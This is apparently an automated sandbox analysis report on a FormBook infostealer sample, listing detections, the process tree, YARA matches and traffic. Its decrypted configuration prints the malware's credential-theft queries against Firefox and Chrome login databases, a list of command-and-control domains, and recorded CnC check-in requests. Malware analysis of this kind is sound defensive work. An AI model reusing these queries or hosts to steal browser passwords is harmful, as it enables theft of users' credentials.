
Analysis Report zHgm9k7WYU.exe

Overview

General Information

Sample Name: zHgm9k7WYU.exe
Analysis ID: 339322
MD5: d97a26894ec19dc562eec833ccb5607f
SHA1: 5aa0632c496d7e1441eef50c61c6a97c5adee565
SHA256: 2fdfbfc735f43a4e2dce0c849b41ab83dd17228f6df983f7a95d6e427cdc77b0
Tags: exe, Formbook


Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match


Startup

  • System is w10x64
  • zHgm9k7WYU.exe (PID: 1928 cmdline: 'C:\Users\user\Desktop\zHgm9k7WYU.exe' MD5: D97A26894EC19DC562EEC833CCB5607F)
    • zHgm9k7WYU.exe (PID: 360 cmdline: {path} MD5: D97A26894EC19DC562EEC833CCB5607F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 4400 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 1688 cmdline: /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d570", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d66e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x9b9701d9", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d7013", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", 
"0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", 
"encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "tknbr.com", "loyaloneconstruction.com", "what-where.com", "matebacapital.com", "marriedandmore.com", "qiemfsolutions.com", "graececonsulting.com", "www7456.com", "littlefreecherokeelibrary.com", "tailgatepawkinglot.com", "musheet.com", "tesfamariamtb.com", "1728025.com", "xceltechuae.com", "harperandchloe.com", "thepamperedbarber.com", "5050alberta.com", "supplychainstrainer.com", "lacorte.group", "ringingbear.com", "dwerux.com", "localeastbay.com", "zhongyier.com", "liamascia.com", "bigdudedesign.com", "agilearccreations.com", "clxkxmk.com", "articlesforthehome.com", "prestiticadalanu.com", "mayanroofingsystems.com", "homeherbgardener.com", "ricardoinman.com", "xrhaoqilai180.xyz", "queromake.com", "holywaterfoundation.com", "modacicekevi.com", "beardeco.com", "universityhysteria.com", "lastguytogetcorona.com", "winton.school", "sanborns.xyz", "bbluebay3dwdshop.com", "mateingseason.com", "oro-iptv.com", "pdlywh.com", "fallgus.com", "dezignercloset.com", 
"dasarelektronika.info", "cyberparkplace.com", "serenshiningarts.com", "edgecase.pro", "binhminhgarrden.net", "fansofads.com", "fortykorp.com", "shastaestatesseniorliving.com", "raksrecording.com", "mack-soldenfx.com", "freisaq.com", "sesaassociates.com", "calerconsult.com", "sarahpyle.xyz", "threepeninsulas.com", "proficienthomesalesandloans.com", "floridasoapwork.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.theatomicshots.com/xle/\u0000"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(18 further memory dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.zHgm9k7WYU.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.zHgm9k7WYU.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.zHgm9k7WYU.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
1.2.zHgm9k7WYU.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.zHgm9k7WYU.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked PE entry not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack | Malware Configuration Extractor: FormBook (the extracted configuration is listed in full in the Malware Configuration section above)
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: zHgm9k7WYU.exe | Joe Sandbox ML: detected
Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Unpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack
Source: zHgm9k7WYU.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: zHgm9k7WYU.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: explorer.pdbUGP | source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.574401869.000000000567F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe
Source: Binary string: explorer.pdb | source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_057EA5DC
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then push dword ptr [ebp-20h] | 0_2_057ECDF8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh | 0_2_057ECDF8
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_057EA5D0
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then push dword ptr [ebp-24h] | 0_2_057ED118
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh | 0_2_057ED118
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then push dword ptr [ebp-24h] | 0_2_057ED10F
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh | 0_2_057ED10F
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then xor edx, edx | 0_2_057ED050
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then xor edx, edx | 0_2_057ED047
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then push dword ptr [ebp-20h] | 0_2_057ECDEC
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh | 0_2_057ECDEC
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_057ECC7F
Source: C:\Users\user\Desktop\zHgm9k7WYU.exe | Code function: 4x nop then pop ebx | 1_2_00407B07
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop ebx | 7_2_010A7B07

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 198.49.23.144:80
Source: global traffic | HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1; Host: www.ricardoinman.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1; Host: www.www7456.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1; Host: www.theatomicshots.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1; Host: www.fallgus.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1; Host: www.bigdudedesign.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153
Source: Joe Sandbox View | IP Address: 198.49.23.144
Source: Joe Sandbox View | IP Address: 198.49.23.144
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View | ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
Source: C:\Windows\explorer.exe | Code function: 2_2_074BC782 getaddrinfo,setsockopt,recv, | 2_2_074BC782
Source: global traffic | HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1; Host: www.ricardoinman.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1; Host: www.www7456.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1; Host: www.theatomicshots.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1; Host: www.fallgus.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1; Host: www.bigdudedesign.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.ricardoinman.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Wed, 13 Jan 2021 19:59:51 GMT; Content-Type: text/html; Content-Length: 505; Connection: close; ETag: "5f98d73b-1f9"; Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a; Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
